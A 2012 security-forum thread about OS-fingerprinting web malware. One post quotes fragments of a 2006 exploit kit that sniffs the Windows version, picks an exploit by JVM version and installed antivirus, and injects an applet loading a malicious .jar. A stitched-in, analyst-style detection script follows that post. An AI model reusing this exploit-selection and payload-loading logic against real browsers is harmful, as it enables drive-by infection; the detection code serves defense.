Web-based malware determines your OS, then strikes

Discussion in 'malware problems & news' started by Thankful, Jul 11, 2012.

Thread Status:
Not open for further replies.
  1. Thankful

    Thankful Savings Monitor

    Joined:
    Feb 28, 2005
    Posts:
    3,737
    Location:
    New York City
  2. m00nbl00d

    m00nbl00d Registered Member

    Joined:
    Jan 4, 2009
    Posts:
    6,623
    Java... where are you? :D
     
  3. I just want to see a Java-based remote access trojan try to hide itself. Kind of like a rhinoceros trying to hide in your front yard.

    LOL. "Buy it! Buy it or the malware will get you!" Lovely hype there from Sophos, and lovely of the columnist to just swallow it up.
     
  4. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,943
    Location:
    California
    More than six years ago, a similar trick determined the version of Windows and IE, and then served up the appropriate exploit.

    Here is some of the code from an exploit in February, 2006:

    Code:
    // launch the exploit whose number depends on the Windows and IE versions
    function Get_Win_Version(IE_vers)
    {
         if (IE_vers.indexOf('Windows 95') != -1) return "95"
         else if (IE_vers.indexOf('Windows NT 4') != -1) return "NT"
         else if (IE_vers.indexOf('Win 9x 4.9') != -1) return "ME"
         else if (IE_vers.indexOf('Windows 98') != -1) return "98"
         else if (IE_vers.indexOf('Windows NT 5.0') != -1) return "2K"
         else if (IE_vers.indexOf('Windows NT 5.1') != -1) return "XP"
         else if (IE_vers.indexOf('Windows NT 5.2') != -1) return "2K3"
    }
    For example, if the user was running Win2K and IE, three exploits were possible:

    Code:
     case "2K":
       if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
       {  ExploitNumber=1;  }
       else     // if JVM = 5.0.3810.0 or higher
         if ((fNortonAV==0)&&(fMcAfee==0))
         { ExploitNumber=3; }
         else
         { ExploitNumber=2; }
    If Exploit (Case) 1 was found to be appropriate, it launched a Java exploit:


    Code:
    case  1:
          Trojan_Path=Trojan_Path+"MS03-11";
          ObjectContainer.innerHTML= applet archive="'+InetPath+'/'+'ie0601a.jar"
    And so it goes...


    ----
    rich
     
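The fragments Rmus quotes show the shape of the trick: read the user agent, branch on the Windows version token, then stage a payload for that branch. The following is an added example, not code from the thread or from any vendor mentioned in it, written from the analyst's side: a runnable counterpart of the version classifier (the token table is the 2006 sample's own, in its order; the Windows NT 6.x entries are my addition) and a static triage function that flags a captured landing-page script when it sniffs the user agent, branches on two or more version tokens, and references a payload. The payload marker list and the sample script it is run against are constructed for the example.

```javascript
// Added example, not code from the thread: triage a captured landing-page script
// for the "sniff the OS version, then pick a payload" pattern quoted above.

// Version tokens the 2006 sample branched on, in the sample's own order
// (order matters: a Windows ME user agent also contains "Windows 98").
// The Windows NT 6.x entries are my own additions, not from the thread.
const WINDOWS_TOKENS = [
  ['Windows 95', '95'], ['Windows NT 4', 'NT'], ['Win 9x 4.9', 'ME'],
  ['Windows 98', '98'], ['Windows NT 5.0', '2K'], ['Windows NT 5.1', 'XP'],
  ['Windows NT 5.2', '2K3'], ['Windows NT 6.0', 'Vista'], ['Windows NT 6.1', '7'],
];

// Runnable counterpart of the thread's Get_Win_Version: classify a user-agent string.
function windowsVersionFromUserAgent(ua) {
  for (const [token, label] of WINDOWS_TOKENS) {
    if (ua.indexOf(token) !== -1) return label;
  }
  return null; // not a Windows user agent, or a version the table does not know
}

// Markers that a script stages something after the version decision. Chosen by me
// from the fragments quoted in the thread; extend for other payload types.
const PAYLOAD_PATTERNS = [
  /<applet\b/i, /archive\s*=/i, /\.jar\b/i, /ExploitNumber/, /Trojan_Path/, /classid\s*=/i,
];

// Static triage of one captured script. Returns the evidence rather than a bare
// verdict so an analyst can see why it fired.
function analyzeScript(source) {
  const osTokens = WINDOWS_TOKENS.map(([t]) => t).filter((t) => source.includes(t));
  const sniffsUserAgent = /navigator\.(userAgent|appVersion)/.test(source);
  const payloadHits = PAYLOAD_PATTERNS.filter((p) => p.test(source)).map((p) => p.source);
  // Two or more distinct version branches plus a payload reference is the shape seen ITW.
  const suspicious = sniffsUserAgent && osTokens.length >= 2 && payloadHits.length > 0;
  return { osTokens, sniffsUserAgent, payloadHits, suspicious };
}

// Constructed sample modelled on the quoted fragments (no working exploit, just the shape).
const SAMPLE_SCRIPT = `
function Get_Win_Version(IE_vers) {
  if (IE_vers.indexOf('Windows NT 5.0') != -1) return "2K";
  else if (IE_vers.indexOf('Windows NT 5.1') != -1) return "XP";
}
var ver = Get_Win_Version(navigator.userAgent);
var ExploitNumber = (ver == "2K") ? 1 : 2;
ObjectContainer.innerHTML = '<applet archive="' + InetPath + '/payload.jar"></applet>';
`;

if (typeof require !== 'undefined' && require.main === module) {
  console.log(windowsVersionFromUserAgent('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)')); // XP
  console.log(analyzeScript(SAMPLE_SCRIPT));
}
```

One practical consequence of the classifier: a crawler or sandbox that fetches a suspect page with a single user agent only ever sees the branch for that one version, so a page that looks benign under one user agent may still serve a different payload to another; the triage function, which works on the script text rather than on what the browser executed, does not have that blind spot.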
  5. Determining which version of Windows is used (or which browser) is common enough that I've personally encountered it ITW. Last time IIRC was with a fake antivirus site, which installed different versions depending on whether you were using IE 6, 7, or 8.
     
  6. xxJackxx

    xxJackxx Registered Member

    Joined:
    Oct 23, 2008
    Posts:
    4,050
    Location:
    USA
    Not on any of my machines. :)
     
  7. Hungry Man

    Hungry Man Registered Member

    Joined:
    May 11, 2011
    Posts:
    9,148
    Pretty cool except:

    1) I don't have Java installed

    2) If I were to install Java it would be sandboxed in a heartbeat

    It also uses the SET
     